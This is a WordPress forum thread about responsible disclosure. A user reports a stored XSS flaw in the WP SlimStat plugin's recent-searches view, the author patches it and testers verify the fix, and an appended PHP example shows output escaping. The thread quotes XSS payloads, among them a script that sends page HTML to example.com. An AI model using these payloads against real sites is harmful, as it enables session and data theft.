WP Slimstat
[resolved] XSS Vulnerability ?!?!? (23 posts)

  1. xssAlert
    Member
    Posted 2 years ago #

    Hello, I found a problem with two plugins and WordPress.

    What I tried:
    ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >">'>

    I put this in the comment field, plugin names "bug library v.1.2.6"
    and a status of plugin "wp-slimstat v2.8.3".
    I'm very sure that the last plugin runs this script. Then when I load the plugin in the admin backend and it shows where the visitors are coming from, the plugin runs this script and produces the alert window! Only this, but
    a rly bad man can do more.

    So pls help to find it out.
    thx

    http://wordpress.org/extend/plugins/wp-slimstat/

  2. camu
    Member
    Plugin Author

    Posted 2 years ago #

    Could you please contact me at

    http://www.duechiacchiere.it/contatto

    to discuss this issue? I was not able to reproduce the issue just by using my plugin. Where did you type the javascript string?

    Thank you,
    Camu

  3. xssAlert
    Member
    Posted 2 years ago #

    read top :)

    srry for my English, but I can send u a screenshot

    I alrdy contacted u over ur site.
    rob

  4. xssAlert
    Member
    Posted 2 years ago #

    ach, put this code into search,
    so ur wp-slimstat plugin just loads it and executes it, where the recent searches are :)

    I am using the last plugins

  5. camu
    Member
    Plugin Author

    Posted 2 years ago #

    I just tried to search for

    ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >">'>

    in my local dev environment, but I couldn't replicate the issue. The string is correctly encoded and so the javascript is not executed. Please elaborate :)

  6. camu
    Member
    Plugin Author

    Posted 2 years ago #

    I just sent you a private message to investigate the issue.

    Thank you for reporting it and for helping make WP SlimStat a better product.

    Camu

  7. xssAlert
    Member
    Posted 2 years ago #

    <script>alert(document.cookie);</script>

    test it on search
    in your wp search
    then log in and load wp-slimstat overview, there u can see last searches

    so enjoy

  8. camu
    Member
    Plugin Author

    Posted 2 years ago #

    I will release a fix as soon as possible, thank you. Please note though that no sensitive information can be transmitted to a different server, because of JavaScript's security policies.

    Best
    Camu

  9. xssAlert
    Member
    Posted 2 years ago #

    yup, but u can load a "bad code" and load viruses etc

  10. camu
    Member
    Plugin Author

    Posted 2 years ago #

    Okay, this should be fixed now. I will release a new version on Monday. In the meantime, would you be interested in testing this new version?

    cheers
    camu

  11. Ov3rfly
    Member
    Posted 2 years ago #

    "Please note though that no sensitive information can be transmitted to a different server, because of JavaScript's security policies."

    That's not correct. Data can be sent to any external server if you use a search-term like this:

    <script>jQuery('<img/>').attr('src','http://example.com/?data='+jQuery('body').html())</script>

    This would send the whole body HTML to example.com server. There are endless possibilities. This should be fixed ASAP.

  12. camu
    Member
    Plugin Author

    Posted 2 years ago #

    Thanks, Ov3rfly, you make a very good point indeed. This has already been fixed in version 2.8.5, which will be released asap. Are you interested in testing it to make sure the vulnerability has been addressed?

  13. xssAlert
    Member
    Posted 2 years ago #

    sure..

    just send it to me by mail :) but no virus XD :))

    WordPress should be fixed too, to enable JavaScript in search box, but no one is interested in it, next change to another CMS

  14. camu
    Member
    Plugin Author

    Posted 2 years ago #

    I'll send it to you as soon as possible, thank you for your help!

    Camu

  15. camu
    Member
    Plugin Author

    Posted 2 years ago #

    Sent it.

  16. xssAlert
    Member
    Posted 2 years ago #

    u alrdy sent me that script 2x
    and it seems not fixed. maybe u can ask in some forums about disabling rendering or whatever

    I can't help u
    your script is now deleted

  17. camu
    Member
    Plugin Author

    Posted 2 years ago #

    Thank you for your patience, xssAlert. I tested each new version of WP SlimStat before sending it to you. I used

    <script>alert(document.cookies);</script>

    as the search string, and it is not being executed anymore in the most recent version I sent you. Could you please be a little more specific about WHERE you have entered that script? Or WHERE it is being executed?

    If you are a security expert, and you really want to help an open source developer to improve his code, could you please try to leverage this vulnerability on MY blog at

    http://www.duechiacchiere.it

    so that I can see it in action? Thank you for your patience, my friend.

    Really appreciated,
    Camu

  18. xssAlert
    Member
    Posted 2 years ago #

    hey ya

    so
    I set db to 0

    deleted

    put in WP Search
    <<SCRIPT>alert("XSS");//<</SCRIPT>

    and your script loads stuff again :/

    I'll look into ur script

  19. xssAlert
    Member
    Posted 2 years ago #

  20. xssAlert
    Member
    Posted 2 years ago #

    ok I am reviding

    plugin works now

    with first test, xss doesn't work

    GJ

  21. camu
    Member
    Plugin Author

    Posted 2 years ago #

    Not sure why it didn't work the first time, but I'm glad you were able to run your test again and verify that the vulnerability is indeed gone :) Ah, these Germans, always a little too skeptical and stubborn... Just kidding! Thank you for reporting the issue and helping me fix it!

    Cheers,
    Camu

    PS: a vote for my plugin would be a nice way to say thank you!

  22. xssAlert
    Member
    Posted 2 years ago #

    yo yo these germans :)

  23. camu
    Member
    Plugin Author

    Posted 2 years ago #

    Haha, I was just kidding of course!

Topic Closed

This topic has been closed to new replies.
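
The thread never shows the plugin's code or the change that fixed it. As an added example (not WP SlimStat's code; the function names and stored rows are hypothetical), the PHP below runs the search strings quoted in the thread through an unescaped and an output-encoded "recent searches" list, the pattern that decides whether a stored search term executes in the administrator's browser. Inside WordPress, `esc_html()` and `esc_attr()` fill the role that `htmlspecialchars()` plays here.

```php
<?php
// Added example, not WP SlimStat's code: function names and rows are hypothetical.
// Constructed sample of stored search terms; the payloads are quoted in the thread
// (the last one is shortened).
$stored_searches = [
    'wordpress backup plugin',
    '<script>alert(document.cookie);</script>',
    '<<SCRIPT>alert("XSS");//<</SCRIPT>',
    "';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-- >\">'>",
];

// Before: the stored term is concatenated into the admin page as-is, so the
// administrator's browser parses any markup it contains.
function render_recent_searches_unsafe(array $terms): string
{
    $html = "<ul>\n";
    foreach ($terms as $term) {
        $html .= '  <li>' . $term . "</li>\n";
    }
    return $html . "</ul>\n";
}

// After: encode when writing into HTML. ENT_QUOTES covers & < > " and ', so the
// term is inert both as element text and inside a quoted attribute.
function escape_for_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_recent_searches_safe(array $terms): string
{
    $html = "<ul>\n";
    foreach ($terms as $term) {
        $safe = escape_for_html($term);
        $html .= '  <li title="' . $safe . '">' . $safe . "</li>\n";
    }
    return $html . "</ul>\n";
}

// Regression check: no markup-significant character survives encoding, and
// decoding gives back exactly what the visitor typed (nothing is stripped).
foreach ($stored_searches as $term) {
    $out = escape_for_html($term);
    if (strpbrk($out, "<>\"'") !== false || html_entity_decode($out, ENT_QUOTES, 'UTF-8') !== $term) {
        throw new RuntimeException('encoding failed for: ' . $out);
    }
}
echo render_recent_searches_unsafe($stored_searches), "\n", render_recent_searches_safe($stored_searches);
```

Encoding at output time keeps the original search term intact in the database, so the statistics stay accurate while the admin page shows the term as text.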
